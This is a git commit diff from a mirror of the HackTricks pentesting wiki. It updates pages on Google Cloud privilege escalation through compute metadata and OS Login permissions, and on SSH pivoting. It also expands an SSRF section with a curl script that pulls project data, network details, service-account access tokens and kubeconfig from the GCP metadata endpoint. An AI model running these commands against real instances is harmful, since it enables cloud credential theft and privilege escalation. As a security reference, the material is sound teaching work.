mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3008] No subject
This commit is contained in:
parent
19f982fe32
commit
3aea4c400a
4 changed files with 125 additions and 41 deletions
|
@ -497,7 +497,6 @@
|
|||
## Cloud Security
|
||||
|
||||
* [GCP Security](cloud-security/gcp-security/README.md)
|
||||
* [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
|
||||
* [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
|
||||
* [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md)
|
||||
|
@ -509,6 +508,7 @@
|
|||
* [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md)
|
||||
* [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md)
|
||||
* [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md)
|
||||
* [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
* [Github Security](cloud-security/github-security/README.md)
|
||||
* [Basic Github Information](cloud-security/github-security/basic-github-information.md)
|
||||
* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
|
||||
|
|
|
@ -154,6 +154,38 @@ For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-pri
|
|||
|
||||
**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
|
||||
|
||||
## compute
|
||||
|
||||
### compute.projects.setCommonInstanceMetadata
|
||||
|
||||
With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
|
||||
Limitations:
|
||||
|
||||
* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
|
||||
* You will need to be **able to contact the SSH** server to login
|
||||
|
||||
For more information about how to exploit this permission check:
|
||||
|
||||
{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
|
||||
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### compute.instances.setMetadata
|
||||
|
||||
This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
|
||||
|
||||
### compute.instances.setIamPolicy
|
||||
|
||||
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
|
||||
|
||||
### **compute.instances.osLogin**
|
||||
|
||||
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
|
||||
|
||||
### **compute.instances.osAdminLogin**
|
||||
|
||||
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
|
||||
|
||||
## container
|
||||
|
||||
### container.clusters.get
|
||||
|
|
|
@ -48,8 +48,6 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
|
|||
* `https://www.googleapis.com/auth/compute`
|
||||
* `https://www.googleapis.com/auth/cloud-platfo`rm
|
||||
|
||||
## **Add SSH keys** 
|
||||
|
||||
### **Add SSH keys to custom metadata**
|
||||
|
||||
**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
|
||||
|
@ -149,26 +147,7 @@ gcloud compute ssh [INSTANCE NAME]
|
|||
|
||||
This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
|
||||
|
||||
## **Using OS Login**
|
||||
|
||||
[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
|
||||
|
||||
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
|
||||
|
||||
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
|
||||
|
||||
The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
|
||||
|
||||
* **roles/compute.osLogin** (no sudo)
|
||||
* **roles/compute.osAdminLogin** (has sudo)
|
||||
|
||||
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
|
||||
|
||||
If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
|
||||
|
||||
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
|
||||
|
||||
## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
|
||||
### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
|
||||
|
||||
Following the details mentioned in the previous section you can try to compromise more VMs.
|
||||
|
||||
|
@ -180,6 +159,25 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
|
|||
|
||||
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
|
||||
|
||||
## **Using OS Login**
|
||||
|
||||
****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
|
||||
|
||||
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
|
||||
|
||||
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
|
||||
|
||||
The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level:
|
||||
|
||||
* **compute.instances.osLogin** (no sudo)
|
||||
* **compute.instances.osAdminLogin** (has sudo)
|
||||
|
||||
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
|
||||
|
||||
If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
|
||||
|
||||
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
|
||||
|
||||
## Search for Keys in the filesystem
|
||||
|
||||
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
|
||||
|
|
|
@ -92,21 +92,81 @@ Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACC
|
|||
|
||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
|
||||
Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
||||
|
||||
```
|
||||
http://169.254.169.254/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/
|
||||
http://metadata/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/hostname
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/id
|
||||
http://metadata.google.internal/computeMetadata/v1/project/project-id
|
||||
```
|
||||
* http://169.254.169.254
|
||||
* http://metadata.google.internal
|
||||
* http://metadata
|
||||
|
||||
Google allows recursive pulls
|
||||
Interesting endpoints to extract information:
|
||||
|
||||
```
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
|
||||
```bash
|
||||
# /project
|
||||
## Project name and number
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
|
||||
## Project attributes
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
|
||||
|
||||
# /oslogin
|
||||
## users
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users
|
||||
## groups
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups
|
||||
## security-keys
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys
|
||||
## authorize
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize
|
||||
|
||||
# /instance
|
||||
## Description
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
|
||||
## Hostname
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
|
||||
## ID
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
|
||||
## Image
|
||||
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
|
||||
## Machine Type
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type
|
||||
## Name
|
||||
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
|
||||
## Tags
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
|
||||
## Zone
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
|
||||
## Network Interfaces
|
||||
for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
|
||||
echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
|
||||
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
|
||||
echo " Gateway: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
|
||||
echo " DNS: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
|
||||
echo " Network: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
|
||||
echo " ============== "
|
||||
done
|
||||
## Service Accounts
|
||||
for sa in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
|
||||
echo " Name: $sa"
|
||||
echo " Email: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email")
|
||||
echo " Aliases: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
|
||||
echo " Identity: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
|
||||
echo " Scopes: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
|
||||
echo " Token: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
|
||||
echo " ============== "
|
||||
done
|
||||
## K8s Attributtes
|
||||
### Cluster location
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
|
||||
### Cluster name
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
|
||||
### Os-login enabled
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
|
||||
### Kube-env
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env
|
||||
### Kube-labels
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
|
||||
### Kubeconfig
|
||||
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
|
||||
```
|
||||
|
||||
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
||||
|
@ -116,12 +176,6 @@ http://metadata.google.internal/computeMetadata/v1beta1/
|
|||
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
```
|
||||
|
||||
Interesting files to pull out:
|
||||
|
||||
* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
|
||||
* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
|
||||
* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
|
||||
|
||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
|
||||
Extract the token
|
||||
|
|
Loading…
Reference in a new issue